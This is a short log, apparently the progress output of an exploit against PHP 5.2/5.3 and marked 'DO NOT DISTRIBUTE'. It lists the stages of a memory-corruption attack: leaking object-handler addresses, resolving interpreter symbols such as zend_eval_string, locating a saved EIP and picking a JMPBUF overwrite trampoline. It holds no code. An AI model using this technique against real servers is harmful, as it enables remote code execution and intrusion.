*** DO NOT DISTRIBUTE ***

[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x

[+] System is little endian

[+] Found std_object_handlers address to be 0xb76e84a0

[+] Looking up ELF symbol: executor_globals

[+] Looking up ELF symbol: php_execute_script

[+] Looking up ELF symbol: zend_eval_string

[+] Determined stored EIP value 0xb753875a from pattern match

[+] Checking memory infront of JMPBUF for overwriting possibilities

[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline